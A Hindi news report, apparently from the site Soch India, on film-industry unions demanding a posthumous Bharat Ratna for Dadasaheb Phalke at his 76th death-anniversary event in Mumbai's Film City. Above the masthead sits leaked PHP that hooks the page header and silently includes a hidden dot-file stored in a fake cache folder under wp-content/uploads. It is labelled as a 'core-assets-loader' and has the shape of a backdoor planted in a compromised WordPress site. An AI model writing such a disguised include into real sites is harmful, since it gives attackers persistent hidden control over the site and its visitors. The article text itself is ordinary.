add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); SOCH INDIA
Menu

देश

nobanner

मुंबई: गोरेगांव चित्रनगरी, ऑल इंडिया सिने वर्कर्स असोसिएशन (AICWA), वेस्टर्न इंडिया फ़िल्म प्रोड्यूसर्स असोसिएशन, ऑल इंडिया मिडिया एम्प्लॉइज असोसिएशन (AiMea-आयमा), भारत सिने राइटर्स असोसिएशन जैसे विविध संगठनोंने आज दादासाहेब फालके जीको मरणोपरांत ‘भारत रत्न’ पुरस्कार देने की जोरदार मांग की गयी.
आज भारतीय सिनेमा के जनक स्वर्गीय दादासाहेब फालके जी का ७६वाँ पुण्यस्मरण था. उसका आयोजन महाराष्ट्र फिल्म, रंगमंच और सांस्कृतिक निगम की ओर से गोरेगांवस्थित दादासाहेब फालके चित्रनगरी (FILM CITY) में किया गया था। दादासाहेब फालके के पोते, श्री चंद्रशेखर पुसालकर सपत्नीक, इस अवसर पर उपस्थित थे।

इस कार्यक्रम के दौरान ऑल इंडिया सिने वर्कर्स असोसिएशन (AICWA) के अध्यक्ष गोरक्ष धोत्रे जीने कहा कि दादासाहब फालके जी को मरणोपरांत ‘भारतरत्न’ से गौरवांकित करने के लिए पूरे फ़िल्म इंडस्ट्री मैं ‘अनुमोदन अभियान’ का चयन हम शुरू करनेवाले है. फ़िल्म व्यवसाय से जुड़े सारे संगठन एकसाथ मिलकर इस चयन को अंजाम तक पहुचायेंगे. वहां उपस्थित सभी संगठनोंने और उनके पदाधिकारियों ने इस चयन का स्वागत करते हुवे इसमे हिस्सा लेने का निर्णय लिया है। इसी दौरान मिडिया एम्प्लॉइज असोसिएशन के महासचिव अजयजी घाटे, इन्होंने सिने कर्मियों की इस एकता को सराहा।
” जब 7 मई, 2019 को ऑस्कर अकादमी के अध्यक्ष जॉन बेले भारत के दौरे पर थे, तो उन्हें ऑल इंडिया सिने और मीडिया अससोसिएशन की तरफ से दादासाहेब फालके जी की शानदार प्रतिमा भेट स्वरूप दी गयी थीं उस दौरान उन्होंने आयोजक ऑस्कर के भारतीय जुरी श्री उज्ज्वल निरगुडकर जी से कहा की ये प्रतिमा याद से मेरे हॉटेल में भिजवा दो. उन्होंने ये भी कहा की मेरे दफ्तर मैं दुनियाभर के फ़िल्म से जुड़े प्रतीक है सिवाय इनके, लेकिन आज दादा साहब की प्रतिमा पाकर वो कमी भी पूरी हो गयी” सिने वर्कर्स के अध्यक्ष गोरक्ष धोत्रेजी ने अपने भाषण में इस घटना की याद पेश कि। उन्होंने आगे कहा कि, आज भी देश के बाहर दादासाहेब के फिल्मो का महत्व और उनके प्रति जिज्ञासा है।

ऑल इंडिया मिडिया एम्प्लॉइज असोसिएशन के राष्ट्रीय महासचिव- अजय घाटे, सिनेवर्कर्स के महासचिव- संतोष बनसोड़े, वेस्टर्न इंडिया फिल्म प्रोड्यूसर्स असोसिएशन के कार्यकारी सदस्य- चंद्रशेखर वर्मा, तारक मेहता सीरियल के प्रोडक्शन प्रमुख विनोद शिशुपाल, भारत रायटर्स असोसिएशन के अध्यक्ष- रविद्रजी अरोरा, अभिनेत्री-मॉडेल केतकी वळसे पाटील, फ़िल्म निर्माती अनीता नाइक, सिनेतारिका सोमाश्वरी आदी प्रमुख मान्यवरोंने दादासाहेब के शिल्प को पुष्पहार अर्पण करके श्रधांजलि समर्पित की।

इस अवसर पर ट्रेड यूनियनों के अधिकारी, राज पटेल, संतोष गायकवाड़, विकी सपकाले, नागनाथ चौगुले और कलाकार, तकनीशियन, श्रमिक और अन्य मान्यवर लोग उपस्थित थे।

दादासाहेब फालके चित्रनगरी के जनसंपर्क अधिकारी मंगेश राउलजी ने समारोह का समारोप करते हुवे सभी उपस्थित गणमान्य व्यक्तियों को धन्यवाद दिया।